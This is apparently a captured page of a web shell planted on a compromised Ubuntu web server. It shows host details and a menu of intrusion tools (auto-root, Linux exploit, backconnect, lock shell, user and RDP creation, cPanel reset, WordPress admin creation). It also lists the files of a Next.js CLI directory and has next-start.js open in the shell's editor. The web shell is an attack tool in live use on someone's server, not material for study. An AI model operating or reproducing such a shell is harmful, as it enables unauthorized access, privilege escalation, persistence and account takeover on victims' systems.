Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
next /
dist /
cli /
[ HOME SHELL ]
Name
Size
Permission
Action
next-build-args.d.ts
98
B
-rw-rw-r--
next-build-args.js
617
B
-rw-rw-r--
next-build-args.js.map
312
B
-rw-rw-r--
next-build.d.ts
166
B
-rw-rw-r--
next-build.js
4.24
KB
-rw-rw-r--
next-build.js.map
1.52
KB
-rw-rw-r--
next-dev-args.d.ts
98
B
-rw-rw-r--
next-dev-args.js
847
B
-rw-rw-r--
next-dev-args.js.map
391
B
-rw-rw-r--
next-dev.d.ts
162
B
-rw-rw-r--
next-dev.js
12.55
KB
-rw-rw-r--
next-dev.js.map
6.99
KB
-rw-rw-r--
next-export-args.d.ts
98
B
-rw-rw-r--
next-export-args.js
463
B
-rw-rw-r--
next-export-args.js.map
262
B
-rw-rw-r--
next-export.d.ts
132
B
-rw-rw-r--
next-export.js
3.91
KB
-rw-rw-r--
next-export.js.map
1.5
KB
-rw-rw-r--
next-info-args.d.ts
134
B
-rw-rw-r--
next-info-args.js
397
B
-rw-rw-r--
next-info-args.js.map
213
B
-rw-rw-r--
next-info.d.ts
447
B
-rw-rw-r--
next-info.js
18.91
KB
-rw-rw-r--
next-info.js.map
9.49
KB
-rw-rw-r--
next-lint-args.d.ts
98
B
-rw-rw-r--
next-lint-args.js
1.25
KB
-rw-rw-r--
next-lint-args.js.map
673
B
-rw-rw-r--
next-lint.d.ts
128
B
-rw-rw-r--
next-lint.js
8.1
KB
-rw-rw-r--
next-lint.js.map
3.92
KB
-rw-rw-r--
next-start-args.d.ts
98
B
-rw-rw-r--
next-start-args.js
512
B
-rw-rw-r--
next-start-args.js.map
278
B
-rw-rw-r--
next-start.d.ts
166
B
-rw-rw-r--
next-start.js
2.26
KB
-rw-rw-r--
next-start.js.map
1.17
KB
-rw-rw-r--
next-telemetry-args.d.ts
98
B
-rw-rw-r--
next-telemetry-args.js
399
B
-rw-rw-r--
next-telemetry-args.js.map
216
B
-rw-rw-r--
next-telemetry.d.ts
138
B
-rw-rw-r--
next-telemetry.js
2.32
KB
-rw-rw-r--
next-telemetry.js.map
1.41
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : next-start.js
#!/usr/bin/env node "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); Object.defineProperty(exports, "nextStart", { enumerable: true, get: function() { return nextStart; } }); require("../server/lib/cpu-profile"); const _startserver = require("../server/lib/start-server"); const _utils = require("../server/lib/utils"); const _getprojectdir = require("../lib/get-project-dir"); const _getreservedport = require("../lib/helpers/get-reserved-port"); const nextStart = async (args)=>{ if (args["--help"]) { console.log(` Description Starts the application in production mode. The application should be compiled with \`next build\` first. Usage $ next start <dir> -p <port> <dir> represents the directory of the Next.js application. If no directory is provided, the current directory will be used. Options --port, -p A port number on which to start the application --hostname, -H Hostname on which to start the application (default: 0.0.0.0) --keepAliveTimeout Max milliseconds to wait before closing inactive connections --help, -h Displays this message `); process.exit(0); } const dir = (0, _getprojectdir.getProjectDir)(args._[0]); const host = args["--hostname"]; const port = (0, _utils.getPort)(args); if ((0, _getreservedport.isPortIsReserved)(port)) { (0, _utils.printAndExit)((0, _getreservedport.getReservedPortExplanation)(port), 1); } const isExperimentalTestProxy = args["--experimental-test-proxy"]; const keepAliveTimeoutArg = args["--keepAliveTimeout"]; if (typeof keepAliveTimeoutArg !== "undefined" && (Number.isNaN(keepAliveTimeoutArg) || !Number.isFinite(keepAliveTimeoutArg) || keepAliveTimeoutArg < 0)) { (0, _utils.printAndExit)(`Invalid --keepAliveTimeout, expected a non negative number but received "${keepAliveTimeoutArg}"`, 1); } const keepAliveTimeout = keepAliveTimeoutArg ? Math.ceil(keepAliveTimeoutArg) : undefined; await (0, _startserver.startServer)({ dir, isDev: false, isExperimentalTestProxy, hostname: host, port, keepAliveTimeout }); }; //# sourceMappingURL=next-start.js.map
Close